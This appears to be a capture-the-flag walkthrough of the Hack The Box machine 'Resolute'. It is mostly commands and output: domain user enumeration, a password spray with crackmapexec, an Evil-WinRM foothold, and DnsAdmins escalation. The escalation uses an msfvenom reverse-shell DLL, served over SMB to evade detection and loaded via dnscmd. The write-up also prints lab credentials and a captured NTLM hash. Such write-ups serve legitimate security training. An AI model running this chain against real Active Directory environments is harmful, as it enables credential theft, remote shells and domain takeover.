Resolute

MediumMachineMar 13, 2026
#nmap#rpcclient#enum4linux#crackmapexec#Evil-winrm

Resolute

{image of site}

nmap

rpcclient

rpcclient $> enumdomusers  
user:[Administrator] rid:[0x1f4]  
user:[Guest] rid:[0x1f5]  
user:[krbtgt] rid:[0x1f6]  
user:[DefaultAccount] rid:[0x1f7]  
user:[ryan] rid:[0x451]  
user:[marko] rid:[0x457]  
user:[sunita] rid:[0x19c9]  
user:[abigail] rid:[0x19ca]  
user:[marcus] rid:[0x19cb]  
user:[sally] rid:[0x19cc]  
user:[fred] rid:[0x19cd]  
user:[angela] rid:[0x19ce]  
user:[felicia] rid:[0x19cf]  
user:[gustavo] rid:[0x19d0]  
user:[ulf] rid:[0x19d1]  
user:[stevie] rid:[0x19d2]  
user:[claire] rid:[0x19d3]  
user:[paulo] rid:[0x19d4]  
user:[steve] rid:[0x19d5]  
user:[annette] rid:[0x19d6]  
user:[annika] rid:[0x19d7]  
user:[per] rid:[0x19d8]  
user:[claude] rid:[0x19d9]  
user:[melanie] rid:[0x2775]  
user:[zach] rid:[0x2776]  
user:[simon] rid:[0x2777]  
user:[naoki] rid:[0x2778]

rpcclient $> enumdomains  
name:[MEGABANK] idx:[0x0]  
name:[Builtin] idx:[0x0]

Getting a lot of information but let's dump all of the domain possible enum4linux

Got creds Pasted image 20220905002646.png

usernamepass
marko
melanieWelcome123!
ryanServ3r4Admin4cc123!

crackmapexec

┌[blackBox]─[06:30-05/09]─[/home/parsec/htb/resolute]
└╼parsec$crackmapexec smb 10.10.10.169 -u users.txt -p 'Welcome123!'
SMB         10.10.10.169    445    RESOLUTE         [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\Administrator:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\Guest:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\krbtgt:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\DefaultAccount:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\ryan:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\marko:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\sunita:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\abigail:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\marcus:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\sally:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\fred:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\angela:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\felicia:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\gustavo:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\ulf:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\stevie:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\claire:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\paulo:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\steve:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\annette:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\annika:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\per:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\claude:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [+] megabank.local\melanie:Welcome123!

Foothold

Evil-winrm

*Evil-WinRM* PS C:\> ls -force  
  
  
   Directory: C:\  
  
  
Mode                LastWriteTime         Length Name  
----                -------------         ------ ----  
d--hs-        12/3/2019   6:40 AM                $RECYCLE.BIN  
d--hsl        9/25/2019  10:17 AM                Documents and Settings  
d-----        9/25/2019   6:19 AM                PerfLogs  
d-r---        9/25/2019  12:39 PM                Program Files  
d-----       11/20/2016   6:36 PM                Program Files (x86)  
d--h--        9/25/2019  10:48 AM                ProgramData  
d--h--        12/3/2019   6:32 AM                PSTranscripts  
d--hs-        9/25/2019  10:17 AM                Recovery  
d--hs-        9/25/2019   6:25 AM                System Volume Information  
d-r---        12/4/2019   2:46 AM                Users  
d-----        12/4/2019   5:15 AM                Windows  
-arhs-       11/20/2016   5:59 PM         389408 bootmgr  
-a-hs-        7/16/2016   6:10 AM              1 BOOTNXT  
-a-hs-         9/5/2022   3:22 AM      402653184 pagefile.sys

Looking in that PSTranscripts dir we see creds for ryan (Added above)


Root Escalation

*Evil-WinRM* PS C:\Users\ryan\Desktop> whoami /groups

GROUP INFORMATION
-----------------

Group Name                                 Type             SID                                            Attributes
========================================== ================ ============================================== ===============================================================
Everyone                                   Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580                                   Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                       Mandatory group, Enabled by default, Enabled group
MEGABANK\Contractors                       Group            S-1-5-21-1392959593-3013219662-3596683436-1103 Mandatory group, Enabled by default, Enabled group
MEGABANK\DnsAdmins                         Alias            S-1-5-21-1392959593-3013219662-3596683436-1101 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10                                    Mandatory group, Enabled by default, Enabled group

DNSAdmin to DomainAdmins https://www.hackingarticles.in/windows-privilege-escalation-dnsadmins-to-domainadmin/

First we need to generate the payload

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.4 LPORT=443 -f dll - root.dll

Then we need to serve that payload over smb so as to avoid windows intrusion detection

sudo smbserver.py s ~/htb/resolute  
[*] Config file parsed                                        
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0  
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0  
[*] Config file parsed                                        
[*] Config file parsed                                        
[*] Config file parsed

Then on the windows machine we need to obtain the dll and run it

$ dnscmd.exe /config /serverlevelplugindll //10.10.14.4/s/root.dll
Registry property serverlevelplugindll successfully reset.                                                                                                                                                                                  
Command completed successfully.

$ sc.exe \\resolute stop dns  
  
SERVICE_NAME: dns  
       TYPE               : 10  WIN32_OWN_PROCESS  
       STATE              : 3  STOP_PENDING  
                               (STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)  
       WIN32_EXIT_CODE    : 0  (0x0)  
       SERVICE_EXIT_CODE  : 0  (0x0)  
       CHECKPOINT         : 0x0  
       WAIT_HINT          : 0x0

$ sc.exe \\resolute start dns

SERVICE_NAME: dns                                                                                                                                                                                                                           
        TYPE               : 10  WIN32_OWN_PROCESS                                                                                                                                                                                          
        STATE              : 2  START_PENDING                                                                                                                                                                                               
                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)                                                                                                                                                             
        WIN32_EXIT_CODE    : 0  (0x0)                                                                                                                                                                                                       
        SERVICE_EXIT_CODE  : 0  (0x0)                                                                                                                                                                                                       
        CHECKPOINT         : 0x0                                                                                                                                                                                                            
        WAIT_HINT          : 0x7d0                                                                                                                                                                                                          
        PID                : 2356                                                                                                                                                                                                           
        FLAGS              :     

Then back in our smbserver.py we see the NTLM hash

sudo smbserver.py s ~/htb/resolute  
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation  
  
[*] Config file parsed  
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0  
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0  
[*] Config file parsed  
[*] Config file parsed  
[*] Config file parsed  
[*] Incoming connection (10.10.10.169,64844)  
[*] AUTHENTICATE_MESSAGE (MEGABANK\RESOLUTE$,RESOLUTE)  
[*] User RESOLUTE\RESOLUTE$ authenticated successfully  
[*] RESOLUTE$::MEGABANK:aaaaaaaaaaaaaaaa:1339b6bc8b4af619fd0e8a8306d1998f:010100000000000000be845c74c1d801e56d4d5994d44eb400000000010010006b00750062005a006800510071006e00030010006b00750062005a006800510071006e000200100075004b0073004e0042  
0063005a007a000400100075004b0073004e00420063005a007a000700080000be845c74c1d8010600040002000000080030003000000000000000000000000040000055f67a35a6d414ea49a8b07cc2958f913c8d64d75d3f4179dd60edb2cf5b78780a001000000000000000000000000000000000  
0009001e0063006900660073002f00310030002e00310030002e00310034002e0034000000000000000000  
[*] Disconnecting Share(1:IPC$)  
[*] Disconnecting Share(2:S)  
[*] Closing down connection (10.10.10.169,64844)  
[*] Remaining connections []